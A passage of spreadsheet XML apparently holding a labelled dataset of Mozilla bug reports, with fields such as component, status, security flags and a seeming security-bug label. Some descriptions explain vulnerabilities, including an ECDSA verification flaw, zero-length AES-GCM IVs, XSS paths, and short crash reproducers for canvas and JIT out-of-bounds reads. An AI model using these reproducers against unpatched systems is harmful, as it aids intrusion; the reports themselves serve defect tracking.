      <c r="U3891" t="n">
        <v>0</v>
      </c>
      <c r="V3891" t="n">
        <v>8</v>
      </c>
      <c r="W3891" t="inlineStr">
        <is>
          <t>10 brightspot swfs cause BusError crashes in tamarin
the failing brightspot test swfs are these:
swfcontents/8/8/W/h/d/88WhdCM2oa7LEOFUWLTIecACMDpI7Pn3IWbuLcgriqA=
swfcontents/9/5/l/p/J/95LpJWNAjFLpICaoXAJQz7mdczUoP7Dmfxc4ES3VGBk=
swfcontents/B/c/1/i/h/bC1ih+sAT4ebkY59y96JMAureAjol+mt2ILEB0kiMa4=
swfcontents/V/H/r/+/7/vhr+7NbQeaZllt30fy7PO6e0KQVtPNjtMecbqcHnJ9U=
swfcontents/i/8/j/L/G/I8JLGQlpXk1gf8NzvbuMr4BPlNzh7gf9zpqdRU7+0m0=
swfcontents/n/A/1/U/H/nA1uHziB5H3JROpDAkYRgks0LtrdUV2ys2P0LtfQqxA=
swfcontents/t/4/7/O/U/T47OUocjM+qiHjVUrDU8zDIqGOc+E9IPutrMcF7mUdU=
swfcontents/t/M/7/w/H/TM7wHriZsLagfFWyK9GAJw8zNgn2NNIGFueCpfhQkms=
swfcontents/y/3/2/b/u/Y32buafpgWx+q7psezVKmh+BDgR7rKwUrp9rzP7pls0=
swfcontents/y/p/u/5/i/YPU5iZkbiLe5SyyCD8D7BcbUBUUNLO55kI8KyTwWUmI=
to reproduce:
use the release debugger shell (has -Dverifyonly):
$ ./avmshell -Dverifyonly avmglue.abc swfcontents/y/p/u/5/i/YPU5iZkbiLe5SyyCD8D7BcbUBUUNLO55kI8KyTwWUmI=
BusError
found in tamarin-redux 5110:c0e58b9d08f5 (failure have occurred there for a while)</t>
        </is>
      </c>
      <c r="X3891" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3892">
      <c r="A3892" t="n">
        <v>1125025</v>
      </c>
      <c r="B3892" t="inlineStr">
        <is>
          <t>2015-01-22 22:57:38 -0800</t>
        </is>
      </c>
      <c r="C3892" t="inlineStr">
        <is>
          <t>ECC correctness issues</t>
        </is>
      </c>
      <c r="D3892" t="inlineStr">
        <is>
          <t>2015-08-07 10:45:11 -0700</t>
        </is>
      </c>
      <c r="E3892" t="n">
        <v>1</v>
      </c>
      <c r="F3892" t="n">
        <v>1</v>
      </c>
      <c r="G3892" t="n">
        <v>3</v>
      </c>
      <c r="H3892" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3892" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3892" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3892" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L3892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3892" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3892" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3892" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr31.8+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q3892" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3892" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3892" t="inlineStr">
        <is>
          <t>3.19.1</t>
        </is>
      </c>
      <c r="T3892" t="n">
        <v>1</v>
      </c>
      <c r="U3892" t="n">
        <v>0</v>
      </c>
      <c r="V3892" t="n">
        <v>24</v>
      </c>
      <c r="W3892" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36
Steps to reproduce:
Examined source code
Actual results:
Incorrect double scalar multiplication algorithm
Expected results:
Implementation should have been correct and efficient. Implementation of ECC multiplication for ECDSA signature validation doesn't handle exceptional cases correctly: an attacker may be able to exploit this to forge signatures.
In detail, the formulas appearing in ecp_jac.c do not handle the case when the addition produces infinity or adds a point to itself. An attacker can use this to generate specially-crafted signatures that cause the validation algorithm to compute the incorrect point. It isn't clear if this can be used to forge signatures. ECDSA verification must use formulas that handle all possible cases, unlike single-point exponentiation where detailed analysis can remove this issue.</t>
        </is>
      </c>
      <c r="X3892" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3893">
      <c r="A3893" t="n">
        <v>876583</v>
      </c>
      <c r="B3893" t="inlineStr">
        <is>
          <t>2013-05-27 23:24:20 -0700</t>
        </is>
      </c>
      <c r="C3893" t="inlineStr">
        <is>
          <t>[Bluetooth][meta](gonk-jb) bluedroid stack Support</t>
        </is>
      </c>
      <c r="D3893" t="inlineStr">
        <is>
          <t>2014-09-24 07:21:32 -0700</t>
        </is>
      </c>
      <c r="E3893" t="n">
        <v>1</v>
      </c>
      <c r="F3893" t="n">
        <v>1</v>
      </c>
      <c r="G3893" t="n">
        <v>6</v>
      </c>
      <c r="H3893" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3893" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3893" t="inlineStr">
        <is>
          <t>Bluetooth</t>
        </is>
      </c>
      <c r="K3893" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3893" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3893" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3893" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3893" t="inlineStr">
        <is>
          <t>[ucid:BTP12, 1.3:p1, ft:devices]</t>
        </is>
      </c>
      <c r="Q3893" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3893" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3893" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3893" t="n">
        <v>1</v>
      </c>
      <c r="U3893" t="n">
        <v>0</v>
      </c>
      <c r="V3893" t="n">
        <v>4</v>
      </c>
      <c r="W3893" t="inlineStr">
        <is>
          <t>Meta bug for supporting bluedroid BT stack for b2g.</t>
        </is>
      </c>
      <c r="X3893" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3894">
      <c r="A3894" t="n">
        <v>1368859</v>
      </c>
      <c r="B3894" t="inlineStr">
        <is>
          <t>2017-05-30 16:33:25 -0700</t>
        </is>
      </c>
      <c r="C3894" t="inlineStr">
        <is>
          <t>AES-GCM implementation of Web Crypto API accepts 0-length IV</t>
        </is>
      </c>
      <c r="D3894" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:56 -0700</t>
        </is>
      </c>
      <c r="E3894" t="n">
        <v>1</v>
      </c>
      <c r="F3894" t="n">
        <v>1</v>
      </c>
      <c r="G3894" t="n">
        <v>3</v>
      </c>
      <c r="H3894" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3894" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3894" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3894" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L3894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3894" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3894" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main56+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3894" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3894" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3894" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3894" t="n">
        <v>1</v>
      </c>
      <c r="U3894" t="n">
        <v>0</v>
      </c>
      <c r="V3894" t="n">
        <v>10</v>
      </c>
      <c r="W3894" t="inlineStr">
        <is>
          <t>Created attachment 8872827
AesGcmBug.html
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Steps to reproduce:
- Generated a AES-GCM key.
- Used the key to encrypt an arbitrary message using an empty buffer as the IV.
(The attached file demonstrates the steps.)
Actual results:
The encryption didn't throw any error.
Expected results:
The encryption function shouldn't accept 0-length IV. 
According to NIST SP 800 38d, Section 5.2.1.1 (http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf), AES-GCM should allow only IVs of bit length 1 .. 2^64-1. The reason is that from ciphertexts encrypted with 0-length IVs or all-zero IVs, it is possible to determine the authentication key.</t>
        </is>
      </c>
      <c r="X3894" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3895">
      <c r="A3895" t="n">
        <v>553938</v>
      </c>
      <c r="B3895" t="inlineStr">
        <is>
          <t>2010-03-21 14:02:37 -0700</t>
        </is>
      </c>
      <c r="C3895" t="inlineStr">
        <is>
          <t>Crash [@ TypedArrayTemplate&lt;unsigned char&gt;::class_constructor(JSContext*, JSObject*, unsigned int, long*, long*) ]</t>
        </is>
      </c>
      <c r="D3895" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E3895" t="n">
        <v>1</v>
      </c>
      <c r="F3895" t="n">
        <v>1</v>
      </c>
      <c r="G3895" t="n">
        <v>3</v>
      </c>
      <c r="H3895" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3895" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3895" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K3895" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3895" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3895" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3895" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3895" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3895" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3895" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3895" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3895" t="n">
        <v>1</v>
      </c>
      <c r="U3895" t="n">
        <v>0</v>
      </c>
      <c r="V3895" t="n">
        <v>32</v>
      </c>
      <c r="W3895" t="inlineStr">
        <is>
          <t>Created attachment 433833
Test Case (will crash your browser if you click "Crash Me")
While writing some performance tests, I made a typo in my code and forgot to write .data when updating a pixel colour value.  This stepped on the ImageData object itself, which then causes us to crash in putImageData:
var canvas = document.getElementById('c');
var ctx	= canvas.getContext('2d');
var imgData = {data: new Array(10*10*4), width:	10, height: 10};
// 
imgData[0] = 0;
ctx.putImageData(imgData, 0, 0);
I've attached a test case with the above code (click "Crash Me" to crash).  See also:
http://crash-stats.mozilla.com/report/index/f69de639-dbd4-4537-8ebd-b7efa2100321</t>
        </is>
      </c>
      <c r="X3895" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3896">
      <c r="A3896" t="n">
        <v>1376584</v>
      </c>
      <c r="B3896" t="inlineStr">
        <is>
          <t>2017-06-27 14:45:55 -0700</t>
        </is>
      </c>
      <c r="C3896" t="inlineStr">
        <is>
          <t>OS X yosemite machines no longer working after reboot</t>
        </is>
      </c>
      <c r="D3896" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E3896" t="n">
        <v>1</v>
      </c>
      <c r="F3896" t="n">
        <v>1</v>
      </c>
      <c r="G3896" t="n">
        <v>6</v>
      </c>
      <c r="H3896" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3896" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J3896" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K3896" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3896" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3896" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3896" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3896" t="inlineStr"/>
      <c r="Q3896" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3896" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3896" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3896" t="n">
        <v>1</v>
      </c>
      <c r="U3896" t="n">
        <v>1</v>
      </c>
      <c r="V3896" t="n">
        <v>14</v>
      </c>
      <c r="W3896" t="inlineStr">
        <is>
          <t>Starting between 6:30am and 7:30am PT machines completed tasks, rebooted, and then never came back to claiming tasks.
After digging in, it seems the machines didn't autologin.  Talking with kmoir it might be related to a password rotation done around this same time this morning.</t>
        </is>
      </c>
      <c r="X3896" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3897">
      <c r="A3897" t="n">
        <v>531364</v>
      </c>
      <c r="B3897" t="inlineStr">
        <is>
          <t>2009-11-27 02:01:19 -0800</t>
        </is>
      </c>
      <c r="C3897" t="inlineStr">
        <is>
          <t>Fix for bug 380474 does not work with security wrappers</t>
        </is>
      </c>
      <c r="D3897" t="inlineStr">
        <is>
          <t>2010-05-09 15:50:18 -0700</t>
        </is>
      </c>
      <c r="E3897" t="n">
        <v>1</v>
      </c>
      <c r="F3897" t="n">
        <v>1</v>
      </c>
      <c r="G3897" t="n">
        <v>3</v>
      </c>
      <c r="H3897" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3897" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3897" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3897" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3897" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3897" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3897" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3897" t="inlineStr">
        <is>
          <t>[sg:high][3.6.x]</t>
        </is>
      </c>
      <c r="Q3897" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3897" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3897" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T3897" t="n">
        <v>1</v>
      </c>
      <c r="U3897" t="n">
        <v>0</v>
      </c>
      <c r="V3897" t="n">
        <v>39</v>
      </c>
      <c r="W3897" t="inlineStr">
        <is>
          <t>Bug 380474 was fixed by innerizing a window early to force an event listener to
be attached to the old inner window.  But, that fix does not deal with security
wrappers (OBJ_TO_INNER_OBJECT(cx, obj) does nothing if obj is a security
wrapper).
And, we need a new fix once a patch in bug 428229 removes
nsEventReceiverSH::AddEventListenerHelper.
On 1.9.1/1.9.0 branches, it's possible to perform an XSS attack.  On trunk and
1.9.2 branch, due to the fix for bug 504021, it's not possible to run code with
the privileges of a target site, but e.g. it's possible to sniff keystrokes on
a target site.</t>
        </is>
      </c>
      <c r="X3897" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3898">
      <c r="A3898" t="n">
        <v>264211</v>
      </c>
      <c r="B3898" t="inlineStr">
        <is>
          <t>2004-10-13 10:43:01 -0700</t>
        </is>
      </c>
      <c r="C3898" t="inlineStr">
        <is>
          <t>terminate spreadfirefox account of user sending spam</t>
        </is>
      </c>
      <c r="D3898" t="inlineStr">
        <is>
          <t>2011-08-05 21:12:32 -0700</t>
        </is>
      </c>
      <c r="E3898" t="n">
        <v>1</v>
      </c>
      <c r="F3898" t="n">
        <v>1</v>
      </c>
      <c r="G3898" t="n">
        <v>5</v>
      </c>
      <c r="H3898" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3898" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J3898" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3898" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3898" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3898" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3898" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3898" t="inlineStr"/>
      <c r="Q3898" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3898" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3898" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3898" t="n">
        <v>1</v>
      </c>
      <c r="U3898" t="n">
        <v>0</v>
      </c>
      <c r="V3898" t="n">
        <v>11</v>
      </c>
      <c r="W3898" t="inlineStr">
        <is>
          <t>spreadfirefox spam has been seen on developer lists:
  http://article.gmane.org/gmane.text.xml.svg.devel/28807
This gives a bad impression of the Mozilla project.  Please close the
spreadfirefox account of the person sending this message.
(spreadfirefox also needs better administrative contact info.  There's no admin
email on the site, and it's not clear who should own this bug.)</t>
        </is>
      </c>
      <c r="X3898" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3899">
      <c r="A3899" t="n">
        <v>705855</v>
      </c>
      <c r="B3899" t="inlineStr">
        <is>
          <t>2011-11-28 13:26:10 -0800</t>
        </is>
      </c>
      <c r="C3899" t="inlineStr">
        <is>
          <t>NSLOTS_LIMIT is too high for JIT'd code</t>
        </is>
      </c>
      <c r="D3899" t="inlineStr">
        <is>
          <t>2012-04-13 18:07:07 -0700</t>
        </is>
      </c>
      <c r="E3899" t="n">
        <v>1</v>
      </c>
      <c r="F3899" t="n">
        <v>1</v>
      </c>
      <c r="G3899" t="n">
        <v>3</v>
      </c>
      <c r="H3899" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3899" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3899" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3899" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3899" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3899" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3899" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3899" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q3899" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3899" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3899" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3899" t="n">
        <v>1</v>
      </c>
      <c r="U3899" t="n">
        <v>0</v>
      </c>
      <c r="V3899" t="n">
        <v>18</v>
      </c>
      <c r="W3899" t="inlineStr">
        <is>
          <t>While reviewing bug 701093, I noticed that the NSLOTS_LIMIT of 2^29 is probably too high. In JM and IM we emit code like:
    mov dest, [slots + index * 8]
The |index * 8| is signed, so to not overflow the index must be &lt; 2^28. With -m -n:
js&gt; Q = []
[]
js&gt; i = 0;
0
js&gt; while (true) {
Q[i] = i;
i++;
}
typein:4: out of memory
js&gt; Q.length
498991104
js&gt; function f() { var a; for (var i = 0; i &lt; 10000; i++) { a = Q[498991103]; } return a; }
js&gt; f();
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000efaffff8
0x0000000100ba2fd5 in ?? ()</t>
        </is>
      </c>
      <c r="X3899" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3900">
      <c r="A3900" t="n">
        <v>1209365</v>
      </c>
      <c r="B3900" t="inlineStr">
        <is>
          <t>2015-09-28 18:20:48 -0700</t>
        </is>
      </c>
      <c r="C3900" t="inlineStr">
        <is>
          <t>MSan: use-of-uninitialized-value in ReadSymbol (decode.c:120)</t>
        </is>
      </c>
      <c r="D3900" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:12 -0700</t>
        </is>
      </c>
      <c r="E3900" t="n">
        <v>1</v>
      </c>
      <c r="F3900" t="n">
        <v>1</v>
      </c>
      <c r="G3900" t="n">
        <v>3</v>
      </c>
      <c r="H3900" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3900" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3900" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3900" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L3900" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3900" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3900" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3900" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q3900" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3900" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3900" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3900" t="n">
        <v>1</v>
      </c>
      <c r="U3900" t="n">
        <v>0</v>
      </c>
      <c r="V3900" t="n">
        <v>3</v>
      </c>
      <c r="W3900" t="inlineStr">
        <is>
          <t>Created attachment 8667049
call_stack.txt
Not sure which component this should go under so I copied bug 366559 for now.
I am fuzzing commit https://github.com/google/brotli/commit/ca29aa22c295daac15baf5d85427ecc7808b515c
This is the version of brotli currently shipping in Firefox (https://hg.mozilla.org/mozilla-central/log/tip/modules/brotli/dec/decode.c).
It is currently used in WOFF2.</t>
        </is>
      </c>
      <c r="X3900" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3901">
      <c r="A3901" t="n">
        <v>1569545</v>
      </c>
      <c r="B3901" t="inlineStr">
        <is>
          <t>2019-07-29 01:51:07 -0700</t>
        </is>
      </c>
      <c r="C3901" t="inlineStr">
        <is>
          <t>Create tests for not deleting user bookmarks</t>
        </is>
      </c>
      <c r="D3901" t="inlineStr">
        <is>
          <t>2019-07-31 04:50:39 -0700</t>
        </is>
      </c>
      <c r="E3901" t="n">
        <v>1</v>
      </c>
      <c r="F3901" t="n">
        <v>1</v>
      </c>
      <c r="G3901" t="n">
        <v>7</v>
      </c>
      <c r="H3901" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3901" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J3901" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K3901" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3901" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3901" t="inlineStr"/>
      <c r="Q3901" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3901" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3901" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3901" t="n">
        <v>1</v>
      </c>
      <c r="U3901" t="n">
        <v>0</v>
      </c>
      <c r="V3901" t="n">
        <v>2</v>
      </c>
      <c r="W3901" t="inlineStr">
        <is>
          <t>Provided patch needs the tests before landing.
There some issues with running tests in the developer's environment (which might need a separate bug).
Patch is provided in https://phabricator.services.mozilla.com/D39513</t>
        </is>
      </c>
      <c r="X3901" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3902">
      <c r="A3902" t="n">
        <v>440308</v>
      </c>
      <c r="B3902" t="inlineStr">
        <is>
          <t>2008-06-19 01:11:50 -0700</t>
        </is>
      </c>
      <c r="C3902" t="inlineStr">
        <is>
          <t>XSS by using XMLHttpRequest and onreadystatechange handler</t>
        </is>
      </c>
      <c r="D3902" t="inlineStr">
        <is>
          <t>2008-08-25 02:15:25 -0700</t>
        </is>
      </c>
      <c r="E3902" t="n">
        <v>1</v>
      </c>
      <c r="F3902" t="n">
        <v>1</v>
      </c>
      <c r="G3902" t="n">
        <v>3</v>
      </c>
      <c r="H3902" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3902" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3902" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3902" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3902" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3902" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3902" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3902" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3902" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3902" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3902" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3902" t="n">
        <v>1</v>
      </c>
      <c r="U3902" t="n">
        <v>0</v>
      </c>
      <c r="V3902" t="n">
        <v>11</v>
      </c>
      <c r="W3902" t="inlineStr">
        <is>
          <t>Please see bug 403168.
This is fx2-only.  On fx2, nsXMLHttpRequest::ChangeState() does not call
CheckInnerWindowCorrectness(), thus, it's possible to perform an XSS attack by
using onreadystatechange handler.
(On trunk, nsXMLHttpRequest::ChangeState() calls NotifyEventListeners(), which
calls CheckInnerWindowCorrectness().)</t>
        </is>
      </c>
      <c r="X3902" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3903">
      <c r="A3903" t="n">
        <v>592671</v>
      </c>
      <c r="B3903" t="inlineStr">
        <is>
          <t>2010-09-01 07:31:59 -0700</t>
        </is>
      </c>
      <c r="C3903" t="inlineStr">
        <is>
          <t>Implement Media Gallery view/template</t>
        </is>
      </c>
      <c r="D3903" t="inlineStr">
        <is>
          <t>2010-10-29 11:54:15 -0700</t>
        </is>
      </c>
      <c r="E3903" t="n">
        <v>1</v>
      </c>
      <c r="F3903" t="n">
        <v>1</v>
      </c>
      <c r="G3903" t="n">
        <v>5</v>
      </c>
      <c r="H3903" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3903" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3903" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3903" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3903" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3903" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3903" t="inlineStr"/>
      <c r="Q3903" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3903" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3903" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T3903" t="n">
        <v>1</v>
      </c>
      <c r="U3903" t="n">
        <v>0</v>
      </c>
      <c r="V3903" t="n">
        <v>3</v>
      </c>
      <c r="W3903" t="inlineStr">
        <is>
          <t>The media gallery needs UI.</t>
        </is>
      </c>
